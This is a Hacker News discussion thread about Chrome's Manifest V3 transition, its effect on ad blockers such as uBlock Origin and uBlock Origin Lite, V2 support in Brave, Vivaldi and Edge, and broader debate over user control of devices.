| While adblocking has gotten most of the focus, it isn't the
| only functionality that is being limited or made more
| complicated. One of my favorite extensions is still not
| available for MV3 because of complications:
| https://github.com/openstyles/stylus/issues/1430
| zamalek wrote:
| Yes, hence "less of an issue," not "not an issue."
| unethical_ban wrote:
| At this point, I wonder why Firefox doesn't have a vivaldi-
| like tracker and ad block interface.
|
| Perhaps it has to do with being a Google-funded browser.
|
| I wonder how hard that would be to implement for someone
| who knew how to do it? Or if the code for that in vivaldi
| is open source?
| Kye wrote:
| It does. Click the little shield in the address bar. I
| assume it blocks some ads even if it's not as effective
| as uBlock Origin.
| luuurker wrote:
| Aren't these v2 extensions being removed from Chrome's store?
| If so, are the alternatives based on Chromium running their
| own store?
| mastazi wrote:
| Yeah that's the problem. I used to be on Brave but having
| to download v2-only extensions[1] manually from each
| developer's website was a pain. I am on a Firefox-based
| browser now and extensions are synced across all my
| computers and it just works.
|
| [1] while pre-existing v2 extensions are still on the store
| at least for now (e.g.
| https://chromewebstore.google.com/detail/ublock-
| origin/cjpal... ) newer ones haven't been able to be added
| to the store for a long time already, e.g. see
| https://libredirect.github.io/faq.html#chrome_web_store
| Sophira wrote:
| Are you certain? The last I heard about it from Vivaldi[0],
| they were only going to keep the MV2 code around so long as
| it's in the upstream codebase:
|
| > We will keep Manifest v2 for as long as it's still
| available in Chromium. We expect to drop support in June
| 2025, but we may maintain it longer or be forced to drop
| support for it sooner, depending on the precise nature of the
| changes to the code.
|
| Note that June 2025 is the same date Google plans to drop
| support completely[1].
|
| [0] https://vivaldi.com/blog/manifest-v3-update-vivaldi-is-
| futur...
|
| [1] https://developer.chrome.com/docs/extensions/develop/migr
| ate...
| yborg wrote:
| Vivaldi team does not respond to any comments asking about
| ongoing v2 manifest support; safe to assume it's gone as
| soon as it's out of Chromium upstream. Given Tetzchner's
| continual messaging on how important user privacy is to
| Vivaldi it seems like a strange decision, but I don't know
| how much effort would be required to maintain the support.
| They're a small team, so it would be understandable if they
| would just say it's too hard, but instead they have avoided
| the topic entirely, which suggests they agree with the
| direction.
| Raed667 wrote:
| Or they just don't want to admit publicly that they're
| too small to maintain a fork when it diverges this much
| tourmalinetaco wrote:
| Well Vivaldi is open source, right? Personally I would be
| reaching out to Brave, who already plans on maintaining
| V2 support, and see about a joint venture with a forked
| chromium.
| Sophira wrote:
| Vivaldi is not open-source:
| https://vivaldi.com/blog/technology/why-isnt-vivaldi-
| browser...
| saagarjha wrote:
| > Even though our license doesn't strictly allow this, we
| welcome it and we encourage users to share these code
| modifications on our forums.
|
| lmao wtf
| tourmalinetaco wrote:
| Ah. They can go fuck themselves then. I had assumed given
| the fact that the source was available.
| rpdillon wrote:
| I was intensely interested in this, and after much
| reading, here's my best understanding:
|
| Neither Brave nor Vivaldi are proposing to maintain
| engine support for v2: they both point to the codebase
| retaining support after Chrome drops support (likely for
| enterprise) as being the driver of their ability to offer
| v2. Both say that once those codepaths are removed, so
| too will v2 support be removed from Vivaldi and Brave.
|
| No idea when Google will make that call.
| tourmalinetaco wrote:
| Alright, so they're both literally just useless wastes of
| man-hours then. Good to know.
| bambax wrote:
| But... what could possibly be the point of using a chromium
| based browser that is not Chrome, if not for MV2 support?
| int_19h wrote:
| In case of Vivaldi, it's features like vertical tabs, and
| extreme customizability for the built-in stuff (for tabs
| alone the options dialog is like 3 pages of checkboxes
| for all the various aspects of how they behave).
|
| Also for those who use cloud bookmark/history/tab sync,
| people might just not want Google specifically to have
| that data; Vivaldi does its own sync.
| KetoManx64 wrote:
| I use both Vivaldi, Brave and Firefox, all have their own
| strenghts. Brave now has built in vertical tabs as well:
| https://brave.com/blog/vertical-tabs/
| andmalc wrote:
| MS Edge, Arc, and Sidekick have features Chrome doesn't
| such as split screen, side panels, and vertical tabs.
| Likewise for Firefox forks such as Zen.
| aydyn wrote:
| None of those things are anything close to killer
| features much less reasons to switch. Verticle tabs,
| seriously?
| ysabri wrote:
| It is all a gimmick but as long as people are switching
| to a chromium based browser and not Firefox I'm happy.
| With that said, I don't know how anyone would trust a
| small team to build them a secure and safe browser.
| Chrome is so battle tested at this point and Google puts
| a lot of resources in maintaining it, they stand to lose
| a lot more given their scale.
| nehal3m wrote:
| And so you throw in your lot with the strongest warlord
| on the block, and then they turn your shelter into a
| prison.
| jocoda wrote:
| Split screen done well would be a killer feature for me.
| Last time I looked Edge support was ok, but not great.
| But what kills Edge for me as a daily driver is the basic
| usability in managing bookmarks and tabs. It's stop and
| go for every basic operation like dragging objects while
| Firefox is simply a continuous flow. Firefox is
| invisible, Edge just gets in the way all the time.
|
| Otherwise Edge is not bad at all. Chrome without MV2 is
| dead to me.
| dikei wrote:
| > Verticle tabs, seriously
|
| Yes, I use Edge due to its vertical tabs
| KetoManx64 wrote:
| Sorry that your personal use case doesn't match my use
| case and workflow. You keep using your tools and I'll
| keep using the ones I like.
| skotobaza wrote:
| People spend a lot of time in the web browser. So yes,
| they want to have a comfortable experience with it. And
| those features are deal breakers for a lot of people. So
| stating that they are not killing features is just
| unreasonable at best and ignorant at worst.
| eviks wrote:
| Customization. There are a lot of bad designs in the
| original Chrome that can be fixed in a fork
| red_admiral wrote:
| I think the supermium chrome fork plans to keep V2 in.
| FuriouslyAdrift wrote:
| Microsoft Edge announced the move to Manifest v3 back in 2020
| and stopped accepting new code on v2 back in 2022...
|
| https://learn.microsoft.com/en-us/microsoft-
| edge/extensions-...
| Springtime wrote:
| Brave is an odd one. They've publicly stated[1] they plan to
| support parts of Manifest v2 for a handful of popular addons
| (uBlock Origin included) by making limited patches, but they
| make no promises.
|
| It seems Shields was their main focus for MV3 mitigation,
| much like Vivaldi's now native content blocker made for the
| same reason (though Vivaldi has said[2] they won't be
| supporting MV2 past the last Chromium build that includes
| it).
|
| [1] https://brave.com/blog/brave-shields-manifest-v3/
|
| [2] https://vivaldi.com/blog/manifest-v3-update-vivaldi-is-
| futur...
| christophilus wrote:
| Why use uBlock on Brave when Brave already blocks ads
| natively?
| tyingq wrote:
| uBlock does have some things that are pretty unique, and
| useful outside of ads for some websites. Element Zapper
| is a good example.
| https://github.com/gorhill/ublock/wiki/Element-zapper
| sebazzz wrote:
| That is easy talking as long as it is still a config flag,
| then after a compile-time flag. Once the internal APIs for
| MV2 or where MV2 get removed or changed it becomes very
| difficult to maintain. Never mind the possible security
| issues you introduce, but won't get so quickly discovered.
| TiredOfLife wrote:
| But they are removing adblock extensions that use v3
| sunaookami wrote:
| No they removed uBO Lite due to a misunderstanding/mistake
| and gorhill choose to not bother with Mozilla's annoying
| "review" process.
| askvictor wrote:
| I guess I'll be moving my work browser across to firefox as
| well (moved personal across a year ago when these shenanigans
| started)
| sirolimus wrote:
| Goodbye Chrome, hello firefox
| freedomben wrote:
| I hoped this day would never arrive, but alas all good things
| must come to an end. Since adopting uMatrix, my web experience
| radically changed and I can never go back to a pre-uMatrix world.
| With the v2 removal, I've got to eliminate Chrome from my life.
|
| I also adopted a workflow that has been very conveninent for many
| years, essentially using Chrome for personal stuff and Firefox
| for work and other various things (especially once container
| support arrived!). It's not going to be easy to undo years of
| muscle memory, but I guess it's time to bite the bullet.
| rtawsc wrote:
| Darn, ublock also no longer works on Firefox for YouTube. At the
| beginning of each video there is one forced ad and sometimes the
| video stops for no reason.
|
| I suppose they want everyone to stop using the Internet and read
| books.
| archerx wrote:
| The Brave Browser still blocks YouTube ads.
| atmavatar wrote:
| I run uBO on FF, and I've yet to see any forced ads or video
| stops.
|
| I'm on FF 131.0.2 with uBO 1.60.0.
| zamalek wrote:
| Are you on premium. YouTube seemingly doesn't care about my
| adblocker because I am on premium.
| aspenmayer wrote:
| You probably need to update your filter lists. There is a
| megathread on Reddit for this issue, because it can have a lot
| of other causes also.
|
| https://old.reddit.com/r/uBlockOrigin/comments/1etvawp/youtu...
| eek2121 wrote:
| Disable all other extensions and update your lists. It will
| work then.
| deadbunny wrote:
| Works for me. I have Youtube on constantly when at my desk as
| background noise and uBo is still blocking everything perfectly
| fine.
|
| Edit: Seems Google/Youtube are experimenting/testing with
| injecting ads directly into the video streams:
|
| https://old.reddit.com/r/uBlockOrigin/comments/1de9kv5/youtu...
| sho wrote:
| Hopefully this is the inflection point for Chrome. Despite all
| their made-up "security" reasons, everyone knows this is solely
| about making adblock less effective. For many users, adblock is
| what makes chrome bearable - and if they make it unbearable, then
| those users will leave. Slowly but surely.
|
| Google seems much too sure of itself making this change. I hope
| their arrogance pays off just the same as Microsoft's did with
| IE.
| Rychard wrote:
| The widespread adoption of Chrome was largely driven by word of
| mouth, people like you and I installing it on our
| friend's/relative's computers and telling them it was
| safer/faster/better.
|
| Nothing stops us from doing the same thing again. I've been
| recommending Firefox to all my family/friends/colleagues for
| years (ever since I've seen the writing on the wall for
| Chrome). While Firefox isn't perfect, it's in a much better
| place than Chrome is, and meets the the needs of nearly 100% of
| people.
| undercut wrote:
| >The widespread adoption of Chrome was largely driven by word
| of mouth
|
| No, it was driven by having a banner in the most privileged
| spot of the Internet, Google.com (the most visited site in
| the world with 0 ads on the homepage) saying that was faster
| and more secure than the alternatives. In fact Firefox
| benefited from some free ads on Google.com against Internet
| Explorer before Google developed Chromium.
| freedomben wrote:
| It was kind of both, depending on the timeline. Early on it
| was word of mouth, then Google saw they had momentum and
| they capitalized on it with the banners and aggressive
| marketing.
| undercut wrote:
| It was a long time ago but I'm 99% sure that there was a
| banner for Chrome on Google.com since the first public
| release.
| j_maffe wrote:
| They were pushing from the very start. They knew the
| potential of taking over the browser market share.
| pkasting wrote:
| So many replies in this sub thread opining
| authoritatively. Share your source. Did you have access
| to the data on Chrome's user growth and which marketing
| campaigns were the sources of which users?
|
| From my perspective, all of you are saying a lot of
| things as if you know them to be true, but you have no
| idea whether they're true or not; really, you just find
| them to be plausible.
| lucianbr wrote:
| Is this really something particular to this thread? I
| feel like most comments on HN are "opining
| authoritatively".
| cyberpunk wrote:
| ... isn't that banner an ad?
| Uehreka wrote:
| Yeah, I feel like in general we on HN give ourselves way
| too much credit in terms of our ability to drive public
| opinion or affect purchasing/usage patterns among the
| public. The idea of the "nerd-led revolution" may have had
| some impact in the past, but I think the days of that are
| over. Large corporations now know what they're doing in
| ways that they hadn't figured out in the 2000s or even the
| early 2010s.
| sunshowers wrote:
| The other aspect, somewhat memory-holed, was that Chrome
| was automatically installed as shovelware if you went to
| install Adobe Flash for IE or Firefox:
|
| https://www.reddit.com/r/chrome/comments/23jnmy/why_is_chro
| m...
|
| This kind of not-freely-given consent was key to Chrome's
| growth.
| badwolf wrote:
| Chrome was bundled with so many installers. Google
| probably spent billions shoving Chrome into any machine
| they could.
| x0x0 wrote:
| Early chrome was driven by the fact that firefox was a
| piece of garbage. Firefox 3 was not good software, and had
| an unpleasant habit of totally crashing the entire browser
| regularly. Your only other popular choice was ie8. Also not
| great.
|
| Later Google's ability to buy installs and put it on
| google.com came into play, but for at least the first 5
| years and probably longer, chrome was a far faster, more
| secure, and more reliable choice. They also pioneered the
| multi-process model to isolate different components of the
| browser.
| Izkata wrote:
| I swear I also remember it getting included in installation
| wizards for unrelated software (on Windows), so people would
| end up with Chrome/Chromium without even realizing it.
| EasyMark wrote:
| I've been out of the windows game for so long I forgot all
| that malware that was installed by various installer
| engines and was so relieved when I found portable apps and
| oldversion.com and ninite. And now I guess there are things
| like chocolaty that do similar things. Switching to Mac and
| Linux I don't really miss it at all
| EasyMark wrote:
| Did you miss the barrage of ads for Chrome that google played
| for literally years on the internet and television?
| Zak wrote:
| Yes. Thanks adblock!
| icehawk wrote:
| The adoption of firefox was driven by word of mouth.
|
| I still can't search on google with them trying to shove
| chrome down my throat
| freedomben wrote:
| Agreed on hoping this is the inflection point, but only partial
| agreement that it's about adblock. For sure Google wants
| adblock to die, but I think it goes even deeper than that.
|
| I think it's part of a much bigger trend in tech in general but
| also in Google: Removing user control. When you look at the
| "security" things they are doing, many of them have a common
| philosophy underpinning them that the user (aka _device owner_
| ) is a security threat and must be protected against. Web
| integrity, Manifest v3, various DoH/DoT, bootloader locking,
| device integrity which conveniently makes root
| difficult/impossible, and more.
|
| To all the engineers working on this stuff, I hope you're happy
| that your work is essentially destroying the world that you and
| I grew up in. The next generation won't have the wonderful and
| fertile computing environment that we enjoyed, and it's
| (partly) your fault.
| justanotheratom wrote:
| yes, iOS now restricts Apps from getting blanket access to
| their contacts, photos, and even clipboard. On the one hand,
| it does protect the user from malicious Apps that trick users
| into giving blanket access. On the other hand, they could
| have atleast done it like location access - where user still
| has an option to give blanket access. It is not fair that
| Siri is the only one that can access these things now.
| moi2388 wrote:
| It can. You can still give apps access to all of it with a
| single press.
|
| And manifest v3 makes things a bit more tedious but not
| impossible. There are other adblockers which still function
| just fine
| kstrauser wrote:
| That's literally how iOS works today. If I go into Settings
| > Privacy & Security > Photos, I can give apps None,
| Limited Access, or Full Access. Same with Contacts, same
| with the clipboard (where the per-app choices are Ask,
| Deny, or Allow).
|
| > It is not fair that Siri is the only one that can access
| these things now.
|
| That would be true if it was, but it isn't.
| kbolino wrote:
| It is important, I think, to understand that personal
| computing is just one part of the picture. "Enterprise"
| environments (governments, businesses, large organizations,
| etc.) have demanded many of these "features" even before
| Google started implementing them. Your workplace, by and
| large, does not want you, the replaceable person who happens
| to be sitting at the keyboard, to be in full control of the
| device that _they_ own and which is connected to _their_
| network. Often this is made more explicit by the device just
| being a "thin client" or other totally locked down narrow
| viewport to some other computer you can't even touch. It
| sucks and the general trend of workplaces trusting their
| employees less and less has been demeaning and degenerative
| to the point of often fostering self-fulfilling prophecies of
| mistrust (don't trust anyone => get untrustworthy people =>
| bad things happen => don't trust anyone => ...).
|
| However, it is important to also understand that the employee
| is not the only stakeholder. Government agencies answer to
| legislators, nonprofit management answer to donors, corporate
| management answer to investors, etc. There are layers of
| compliance that must be considered as well (internal
| policies, external regulations, different insurance costs,
| etc.). It is unsurprising that these fewer but generally
| deep-pocketed entities have an outsized influence on the
| market compared to more numerous but less moneyed end users.
| If you refuse to serve the former, you may quickly find
| yourself out of business.
| EasyMark wrote:
| Then they could have made Mv3 an option to turn on by
| sysadmins who lock down their browsers. If you aren't
| locking down your users browsers then that's on you. I mean
| at worst they could have made mv2 opt-in and most people
| would have highly curtailed their complaints of "I'll jump
| ship to _____________" . People don't like it when features
| are removed especially when there are viable alternatives
| like, adding a special tier of review to get mv2 approval
| for your extension, opt-in/out as discussed, easy access by
| sysadmins to turn it on/off. Instead google pulled a bully
| "so, pencil-neck, what are you gonna do about it?" instead.
| They are tone-deaf and see themselves as the new 800lb
| silverback on the block.
| kbolino wrote:
| I was mostly commenting on the "broader trend" aspects
| and the assignment of primary blame to implementing
| engineers.
|
| There's another problem with Chrome, which is that nobody
| is actually paying for it. So the big corps move features
| along there only in the sense that they won't adopt it or
| will drop it otherwise. I don't think the big corps are
| pushing for Mv3 but they also probably don't care that it
| arrives either. Conversely, I wager Google estimates
| nearly nobody will revolt and leave Chrome over the loss
| of Mv2. It hurts ad-blocker developers and it hurts the
| most conscious users, but Chrome is a marketing product
| targeted at mass adoption first and foremost. I
| personally hope their estimation is wrong and the current
| browser monopoly breaks, but this may not yet be the
| breaking point.
|
| Even if that happens, Chrome eagerly adopting enterprise
| policy support may keep it on life support in that
| environment, though.
| aftbit wrote:
| Well to some extent they did make it Mv3 an option, not
| forever but for an extra few months, with that enterprise
| policy flag. Enterprises used their weight to demand not
| a more secure browser, but an extra flag to allow them to
| keep running old software longer. Enterprises too are
| treated as a security threat by Google, who still plans
| to depreciate Mv2 format, forcing them to move to "more
| secure" extensions.
| consp wrote:
| > It sucks and the general trend of workplaces trusting
| their employees less and less
|
| You get what you pay for. Seeing that employee retention is
| frowned upon.
| userbinator wrote:
| Ironically, the FBI recommends using an ad blocker:
| https://news.ycombinator.com/item?id=41483581
| kbolino wrote:
| A lot of enterprises run MITM on all HTTPS connections
| and can just block the ad-serving domains or even remove
| the ads from the page without any help from the browser.
| Ad blocker extensions are a low-infrastructure solution
| that's more useful for home users and small companies.
| Cthulhu_ wrote:
| I get why they built in all of those protections; the vast
| majority of tech users are not knowledgeable about the
| details of the stuff they use. And I think a big chunk of
| those that are, overestimate their own abilities, knowledge,
| and control. They all need to be protected against
| themselves.
|
| That said, I don't like that the choice is being taken away.
| If you do want to tinker at that level with the technology
| you own, you should be given the choice. By all means make it
| not obvious how to get there - like, have people reboot their
| computers while playing Twister on their keyboards with
| interesting key combos, but give them the option.
| Arch-TK wrote:
| The technologies themselves are mostly a good idea. The
| problem is that the companies designing them also like to
| abuse them.
|
| Take, for example, hardware attestation on android. There's
| not really any serious issue with this feature, it can be
| used to ensure your device is not compromised. This is for
| example how GrapheneOS enables its use with the auditor
| application.
|
| But, on the other hand, Google abuses the feature to ensure
| that you are running a google signed OS if you want to use
| Google Pay. Meanwhile you can use banking apps which also use
| hardware attestation (although, from their perspective, they
| don't use enough of it to ensure it isn't being spoofed, and
| even then...) without any problem on GOS. Moreover, before
| Google Pay completely killed all of its competition, it was
| possible to even find third party banks which would provide
| you with the ability to pay with your phone without using
| google pay.
|
| Likewise, secure boot is a great concept if you want to be
| more sure about the integrity of your laptop throughout its
| lifetime. But some companies have abused it to force you to
| use Windows. If you want to set up your own signing keys for
| secure boot, you end up having to deal with poorly managed
| UEFI keys from third parties which weaken the security of
| your machine. The feature, as it's implemented, is rarely
| designed with helping end user's secure their machines. But
| the core of the design is fine.
|
| I think limiting root on a phone is also a really good idea,
| the issue is that Google likes to give themselves and their
| "system apps" special privileges. If APIs were exposed to
| allow you to bless your own applications with the right
| permissions, you would probably not care so much about root
| restrictions.
|
| So all in all, fundamentally, most of these features are
| fine. They're genuinely great for security. But the main
| problem is how they're abuse by the companies in control and
| how little effort is put into allowing power-users to use
| those features for their own benefit.
| freedomben wrote:
| No disagreement here, although if past experience has
| proven anything I think it's that companies _will_ abuse
| whatever "security features" they can to accomplish their
| objectives. It reminds me a lot of the old adage, "the same
| wall can keep people in just like it can keep people out."
|
| When the OS is fundamentally in the user's control, they
| are limited in what they can do, but when the OS disregards
| it's owners preferences/desires and enforces it's creators
| desires.
|
| Minor thing actually:
|
| > _If APIs were exposed to allow you to bless your own
| applications with the right permissions, you would probably
| not care so much about root restrictions._
|
| I absolutely agree with this in theory, but in practice I'm
| not sure it would ever work because they just aren't going
| to put in the work to build and maintain APIs for things
| they don't care about, and there would be a very long tail
| of things to do (and sometimes those things are
| legitimately a lot of work). Call recording being a classic
| example.
|
| But all in all, I very much agree. I love those features
| when they are in my control on my devices. Biggest issue
| is, they virtually never are and the number of occurences
| is trending down.
|
| Anyway,
| Arch-TK wrote:
| > I absolutely agree with this in theory, but in practice
| I'm not sure it would ever work because they just aren't
| going to put in the work to build and maintain APIs for
| things they don't care about, and there would be a very
| long tail of things to do (and sometimes those things are
| legitimately a lot of work). Call recording being a
| classic example.
|
| I thought about this a bit and I think that at the end of
| the day, the entire OS is just a bunch of these APIs. And
| I do think there's even a market for these APIs, they
| just don't want to set that precedent, I don't think it
| has anything to do with it being a lot more work than
| anything else they expose. They already have some very
| privileged APIs you can bless some apps (e.g. think of
| MDM) except not for everything and in the case of the MDM
| APIs it's very difficult to use it as a normal end-power-
| user.
| kuhsaft wrote:
| > To all the engineers working on this stuff, I hope you're
| happy that your work is essentially destroying the world that
| you and I grew up in.
|
| That was a world where the user base was much more limited
| and devices were less capable. Now we have children,
| grandparents, educated, and uneducated users with access to
| web connected devices. These devices now contain everything
| about you. Compromise of a device can destroy someone's life.
|
| Not only that, but compromise of a device can cause
| collateral damage to other devices on the same network.
|
| We now have to cater to every user. Not just to the
| technologically adept. Look at what people believe on social
| media. The bar is so low to con people into compromising
| their device.
| jauntywundrkind wrote:
| Still a shit poor pathetic excuse to screw over the
| userscript/grease monkey users.
|
| The browser is called a user agent, but this shift to
| absolute security no matter what, no say about it is a
| shift to native apps, is a shift to the developer is in
| control, is a shift to this being Google and the sites
| browser, not ours, and that being done unilaterally with
| nearly no opt outs is the sort of mega tectonic shift that
| ruins this magical special unique place in software where
| users had some say in what was happening. We cannot pander
| to imagined ever worsening users forever.
|
| It feels like the things being done in the name of security
| are really building an immense prison. The work being done
| to allow verified age and identity checking ranks up there
| highly in the _this corals humanity,_ area, not giving us
| agency.
| kuhsaft wrote:
| > Still a shit poor pathetic excuse to screw over the
| userscript/grease monkey users.
|
| Tampermonkey still works fine with MV3
|
| > We cannot pander to imagined ever worsening users
| forever.
|
| The most popular software/hardware will always pander to
| the most users. That's why they're the most popular.
|
| You can't complain about the most popular option
| pandering to the most users. Well, you can complain, but
| you might be in the minority of the users.
|
| > It feels like the things being done in the name of
| security are really building an immense prison.
|
| I get that, but we are running so much untrusted code on
| our machines now. Applications that use thousands of
| dependencies with the hope that someone spots a bad
| actor.
| jauntywundrkind wrote:
| The prohibitions against running code dynamically are
| quite severe. It took a long long time & there's some
| work to make sure userscript/contrntScript extensions
| aren't totally shit out of luck (after years and years of
| delay & nothing), but whole domains of extension -
| anything where you run code on the fly - have been
| outlawed.
| pixl97 wrote:
| The problem is one of balance.
|
| Write insecure software and you'll get screwed by hackers.
| Write secure locked down software nobody can touch or
| modify, and you'll get doubly screwed by a large
| corporation that wants to pound every penny they can out of
| your bloody corpse, upto the point your device is
| compromised by the corporation who can do whatever they
| want, but you cannot tell.
|
| There is no win situation here, there are only trade offs.
| imiric wrote:
| > Compromise of a device can destroy someone's life.
|
| So in order to prevent a hypothetical hacker bogeyman from
| getting our data we gladly entrust it to corporations that
| actively squeeze every possible cent out of it by, among
| other things, giving access to it to other corporations and
| uncountable "partners" that will feed us content with the
| goal of psychologically manipulating us into buying things
| we don't need, or thinking things someone else wants us to
| think, destroying the very fabric of society in the
| process.
|
| I somehow find all of that delusional, our acceptance and
| support of it nightmarish, and trust hackers to be less
| diabolical in their schemes.
|
| Computers should serve us, not the other way around. The
| solution to these problems is tech education, not tech
| babysitters.
| pipo234 wrote:
| > To all the engineers working on this stuff, I hope you're
| happy that your work is essentially destroying the world that
| you and I grew up in.
|
| I recently quit my job, developing among others the means to
| "protect" media using DRM. While this was not a primary
| motivation, I'm glad to somewhat clean my hands.
|
| The technology (dubbed Common Encryption) is a bunch of smoke
| and mirrors that a childishly easy to hack around. Yet
| clearly aimed against good faith consumers.
| immibis wrote:
| That's a good job - people who don't like DRM (you) get
| more money, and the bad DRM is a distraction that delays
| the implementation of good DRM.
| shadowgovt wrote:
| Their incentive is really to make the Chrome Web Store a
| tractable problem with minimal human effort. That's about 75%
| of the incentive. You can't actually make any guarantees at
| the CWS level regarding safety of audited code if the API
| allows audited code to execute non-audited code.
|
| > To all the engineers working on this stuff, I hope you're
| happy that your work is essentially destroying the world that
| you and I grew up in.
|
| May I be blunt? I grew up in it, so yes. I am. I was there
| for the Windows virus wildfires. I was there for the malware
| distribution schemes. I was there for the first wave of
| enshittification. For the dotcom crash. For the spam wars.
| For the search engines that didn't work. For the JavaScript
| injection attacks. For the world where "nobody knew you were
| a dog" as long as you didn't talk like yourself. I couldn't
| trust most of my relatives to use a computer the way we had
| to use them in the late '90s / early aughts. That's not a
| problem now.
|
| For all its flaws, the modern system is cleaner, simpler,
| faster, and better for end users and no longer requires them
| to be super-nerds (and meanwhile, open and malleable devices
| are still there for the super-nerds to play with and work
| with). This was the _goal_ ---to make computers something
| that benefit everyone, not just the technorati and the
| priest-class.
|
| May the past become a foreign country, hard for the modern
| mind to comprehend. May it always be so.
| userbinator wrote:
| _I think it 's part of a much bigger trend in tech in general
| but also in Google: Removing user control. When you look at
| the "security" things they are doing, many of them have a
| common philosophy underpinning them that the user (aka device
| owner) is a security threat and must be protected against._
|
| IMHO that's actually part of an even bigger _societal_ trend.
| "You will own nothing and be happy."
|
| The ones in power want to control everyone and turn them into
| mindless sheeple to be exploited and milked. It's not just
| tech. There's another comment around here that mentions
| features being requested by large corporations and
| governments.
| cookiengineer wrote:
| You should stop seeing the Browser as a software as a program
| that's controlled by the user. This idea was over when
| Microsoft started to display ads in the file manager program
| (explorer).
|
| The modern Web Browser is an advertisement terminal. If
| Google would manage to eliminate having to serve content,
| they would certainly do it.
| akira2501 wrote:
| > and it's (partly) your fault
|
| Punching down into a brutal labor environment instead of
| punching up into a Congress which was blatently bought off to
| foment this outcome? Odd choice.
| crazygringo wrote:
| > _everyone knows this is solely about making adblock less
| effective_
|
| I _thought_ I knew that.
|
| Then I switched from uBlock Origin to uBlock Origin Lite in
| Chrome, which is compatible with Manifest v3. I was prepared
| for the horrible onslaught of ads, expecting at least a quarter
| would start getting through, ready to switch to Firefox...
|
| ...and didn't notice a single change. Not a single ad gets
| through.
|
| And at the same time, loading pages feels a little faster,
| though I haven't measured it.
|
| Which has now got me wondering -- what if Manifest v3 really
| _was_ about security and performance all along?
|
| Because if Google was using it to kill adblockers, they've made
| approximately 0% progress towards that goal as far as I can
| tell. If they really wanted to kill adblockers, they'd just,
| you know, _kill adblockers_. But they didn 't at all.
| moi2388 wrote:
| It makes things a bit more annoying? But in v3 you can still
| do everything you need to do to block ads
| flohofwoe wrote:
| > ...and didn't notice a single change. Not a single ad gets
| through.
|
| When I tried UBO Lite recently it couldn't block YouTube ads,
| not sure if that's impossible with Manifest V3, or if UBO
| Lite just isn't updated regularly like UBO to defeat the
| YouTube anti-ad-blocking updates.
|
| Update: looks like it's fixed now, not bad :)
| Cthulhu_ wrote:
| Youtube's adblocker-evasion and adblocker's youtube ad
| blocking has been a cat-and-mouse game since time
| immemorial.
| surajrmal wrote:
| People seem to see what they want. And many seem to be
| blinded by Google hate and must find ways to be unhappy with
| all decisions they make. Google has publicly delayed v2
| depreciation to ensure ad blockers worked well under v3.
| Spunkie wrote:
| This is just because Google was especially insidious about
| how they crippled ad blockers in v3.
|
| Adblockers do multiple things:
|
| 1. Visibly block ads from the user
|
| 2. Block the user tracking that's attached to those ads
|
| 3. Protect the user from malware
|
| 4. Save bandwidth and cpu cycles by not loading all that junk
|
| 5. Allow control to users over how a webpage is displayed to
| them
|
| Arguably uBlock Origin Lite can only accomplish some of #1
| and a sprinkle of #2 now. And even those abilities are
| compromised by artificially low limits imposed by chrome in
| v3 that will eventually allow ad networks to overwhelm those
| limits and get ads through to users.
|
| Google is 100% boiling the frog here and you/the average user
| is left in the pot unaware.
| crazygringo wrote:
| I don't think any of that is accurate though.
|
| Manifest v3 blocks user tracking -- if the request is
| blocked, any tracking attached to it is blocked. I'm sure
| it's not 100% perfect, but it's certainly working well
| enough in practice.
|
| And what malware are you talking about? If a request is
| blocked, it's blocked. It doesn't matter if it's an ad or
| malware.
|
| Manifest v3 is _better_ at #4, because the junk isn 't
| loaded, _and_ the blocking is more efficient in terms of
| CPU.
|
| And then #5 I don't know what you're talking about. I use
| Stylus and Tampermonkey to customize webpages and they
| continue to work great.
|
| So I just don't see the _evidence_ that "Google is 100%
| boiling the frog here". That's what everyone was saying,
| but now that Manifest v3 has come out, I just see
| adblocking that continues to work and uses less CPU to do
| it.
|
| I see a lot of _fearmongering_ around Google, but now that
| the results are in with Manifest v3... they just don 't
| seem true. You're making all these claims, but I just don't
| see the evidence now that we're seeing how it works _in
| practice_.
| Spunkie wrote:
| Explain to me how uBlock Origin can realistically go from
| 100,000 to 500,000 dynamic rules down to 30k rules(only
| 5k of those can be dynamic) in the Lite version without
| losing the ability to actually block everything?
|
| These limits are easy targets for ad networks to
| overwhelm or outmaneuver. That's what
| everyone was saying
|
| Everyone was saying that the new API is less capable than
| the old API at blocking things. DeclarativeNetRequest IS
| less capable; that's just a fact.
|
| No one was saying that adblockers would literally stop
| working, so it's beyond disingenuous to dismiss people's
| issues with these changes by just saying 'works for me'.
|
| What evidence would you actually accept anyway? Do you
| need a leaked internal document from Google saying
| literally 'devs, go neuter adblockers' before you believe
| Google might have bad intentions surrounding people's
| ability to block ads and tracking?
|
| If security and performance were the actual driving
| forces of DeclarativeNetRequest, then they would have
| simply added it in addition to the existing webRequest
| block functionality. uBlock Origin and most extensions
| would have happily moved the majority of their rules to
| the static list if it meant better performance and
| privacy while keeping around the webRequest blocks for
| the things that actually need it.
|
| Google has gone from having only one nuclear-level option
| for influencing adblockers (aka delisting) to now having
| its boot softly pressed against their necks and plenty of
| levers to pull. And you want me to look at that and go,
| 'There's no direct _evidence_ of malicious intention
| there... so perfectly normal and /or acceptable behavior
| by the world's biggest ad company'?
| crazygringo wrote:
| > _Explain to me how uBlock Origin can realistically go
| from 100,000 to 500,000 dynamic rules down to 30k
| rules(only 5k of those can be dynamic) in the Lite
| version without losing the ability to actually block
| everything?_
|
| I don't know and I don't have to. All I know is uBlock
| Origin Lite is still blocking everything. So it seems
| like 30K rules is plenty? Like it's not a meaningful
| difference for end users if it's blocking 99.99% vs
| 99.9999% of ads?
|
| > _No one was saying that adblockers would literally stop
| working_
|
| That's sure what it sounded like. That it would literally
| be so bad you'd have to switch browsers because of how
| degraded the experience would be.
|
| > _What evidence would you actually accept anyway?_
|
| The fact that the adblocking experience was significantly
| degraded for the average user -- e.g. that now 10% or 25%
| of ads were getting through.
|
| > _And you want me to look at that and go, 'There's no
| direct evidence of malicious intention there... so
| perfectly normal and/or acceptable behavior..._
|
| Yeah, pretty much. As far as I can tell, security and
| performance seem to justify the Manifest v3 changes.
| Occam's Razor says you don't need anything else. If you
| think there's malicious intention, then the onus of proof
| is on you.
|
| I was told, time and time again, than Manifest v3 would
| result in an adblocking experience so bad that people
| would start switching browsers because of it, that Google
| was cracking down on adblockers to neuter them. Now that
| it's here and my adblocking works just as well, maybe
| even better (if it's sped up page loading times) -- then
| sorry, as far as I can tell the malicious intention was
| made-up.
| Dylan16807 wrote:
| > That's sure what it sounded like. That it would
| literally be so bad you'd have to switch browsers because
| of how degraded the experience would be.
|
| > I was told, time and time again, than Manifest v3 would
| result in an adblocking experience so bad that people
| would start switching browsers because of it
|
